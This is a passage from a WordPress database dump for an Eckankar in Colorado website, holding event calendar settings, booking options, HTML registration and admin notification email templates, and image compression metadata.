ate\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(182432,268440,'mec_certain_weekdays','a:0:{}'),(182433,268440,'mec_allday','0'),(182434,268440,'one_occurrence','0'),(182435,268440,'mec_hide_time','0'),(182436,268440,'mec_hide_end_time','0'),(182437,268440,'mec_comment',''),(182438,268440,'mec_timezone','global'),(182439,268440,'mec_countdown_method','global'),(182440,268440,'mec_public','1'),(182441,268440,'mec_start_date','2023-05-28'),(182442,268440,'mec_start_time_hour','12'),(182443,268440,'mec_start_time_minutes','0'),(182444,268440,'mec_start_time_ampm','PM'),(182445,268440,'mec_start_day_seconds','43200'),(182446,268440,'mec_end_date','2023-05-28'),(182447,268440,'mec_end_time_hour','1'),(182448,268440,'mec_end_time_minutes','20'),(182449,268440,'mec_end_time_ampm','PM'),(182450,268440,'mec_end_day_seconds','48000'),(182451,268440,'mec_repeat_status','1'),(182452,268440,'mec_repeat_type','advanced'),(182453,268440,'mec_repeat_interval','1'),(182454,268440,'mec_repeat_end','occurrences'),(182455,268440,'mec_repeat_end_at_occurrences','11'),(182456,268440,'mec_repeat_end_at_date',''),(182457,268440,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(182458,268440,'mec_in_days',''),(182459,268440,'mec_not_in_days',''),(182460,268440,'mec_hourly_schedules','a:0:{}'),(182461,268440,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182462,268440,'mec_tickets','a:0:{}'),(182513,268445,'original-file','2023/05/shariyat-book-3-updraft-pre-smush-original.jpg'),(182514,268445,'smush-complete','1'),(182515,268445,'smush-info','The file was compressed from 106.91 KB to 102.51 KB saving 4.11 percent using WP-Optimize'),(182463,268440,'mec_fees_global_inheritance','1'),(182464,268440,'mec_fees','a:0:{}'),(182465,268440,'mec_ticket_variations_global_inheritance','1'),(182466,268440,'mec_ticket_variations','a:0:{}'),(182467,268440,'mec_reg_fields_global_inheritance','1'),(182468,268440,'mec_reg_fields','a:0:{}'),(182469,268440,'mec_bfixed_fields','a:0:{}'),(182470,268440,'mec_op','a:0:{}'),(182471,268440,'mec_fields','a:0:{}'),(182472,268440,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:5886:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>XXXXXX<br />\r\n<b>Passcode:</b> XXXXX</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"#\">URL GOES HERE</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:9994:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(182473,268440,'mec_event_status','EventScheduled'),(182474,268440,'mec_moved_online_link',''),(182475,268440,'mec_cancelled_reason',''),(182476,268440,'mec_display_cancellation_reason_in_single_page',''),(182477,268440,'protect_children',''),(182478,268440,'passster_activate_global_protection',NULL),(182479,268440,'passster_activate_protection',NULL),(182480,268440,'passster_protection_type','password'),(182481,268440,'boldgrid_hide_page_title','0'),(182482,268440,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(182483,268440,'boldgrid_in_page_containers','1'),(182485,268440,'_dp_original','266543'),(182486,268440,'_edit_lock','1688010455:2'),(182487,268440,'passster_area_shortcode',''),(182488,268440,'_edit_last','2'),(182532,268447,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(182512,268440,'_thumbnail_id','268445'),(182516,268445,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:109474;s:12:\"smushed-size\";i:104975;s:15:\"savings-percent\";d:4.11000000000000031974423109204508364200592041015625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:109474;s:10:\"compressed\";i:104975;}s:6:\"medium\";a:2:{s:8:\"original\";i:18598;s:10:\"compressed\";i:18414;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8276;s:10:\"compressed\";i:8276;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:28014;s:10:\"compressed\";i:27633;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:47110;s:10:\"compressed\";i:46269;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33156;s:10:\"compressed\";i:32610;}s:8:\"tileview\";a:2:{s:8:\"original\";i:34854;s:10:\"compressed\";i:34405;}}}'),(182517,268447,'protect_children',''),(182518,268447,'mec_color',''),(182519,268447,'mec_location_id','166'),(182520,268447,'mec_dont_show_map','0'),(182521,268447,'mec_organizer_id','1'),(182522,268447,'mec_start_date','2023-05-13'),(182523,268447,'mec_start_time_hour','10'),(182524,268447,'mec_start_time_minutes','30'),(182525,268447,'mec_start_time_ampm','AM'),(182526,268447,'mec_start_day_seconds','37800'),(182527,268447,'mec_end_date','2023-05-13'),(182528,268447,'mec_end_time_hour','11'),(182529,268447,'mec_end_time_minutes','30'),(182530,268447,'mec_end_time_ampm','AM'),(182531,268447,'mec_end_day_seconds','41400'),(182510,268445,'_wp_attached_file','2023/05/shariyat-book-3.jpg'),(182511,268445,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:759;s:6:\"height\";i:427;s:4:\"file\";s:27:\"2023/05/shariyat-book-3.jpg\";s:8:\"filesize\";i:109474;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"shariyat-book-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18598;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"shariyat-book-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8276;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"shariyat-book-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28014;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"shariyat-book-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47110;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"shariyat-book-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33156;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"shariyat-book-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34854;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182533,268447,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(182534,268447,'mec_certain_weekdays','a:0:{}'),(182535,268447,'mec_allday','0'),(182536,268447,'mec_hide_time','0'),(182537,268447,'mec_hide_end_time','0'),(182538,268447,'mec_comment',''),(182539,268447,'mec_repeat_status','0'),(182540,268447,'mec_repeat_type',''),(182541,268447,'mec_repeat_interval','1'),(182542,268447,'mec_repeat_end',''),(182543,268447,'mec_repeat_end_at_occurrences',''),(182544,268447,'mec_repeat_end_at_date',''),(182545,268447,'mec_advanced_days','a:0:{}'),(182546,268447,'mec_in_days',''),(182547,268447,'mec_not_in_days',''),(182548,268447,'mec_hourly_schedules','a:0:{}'),(182549,268447,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s: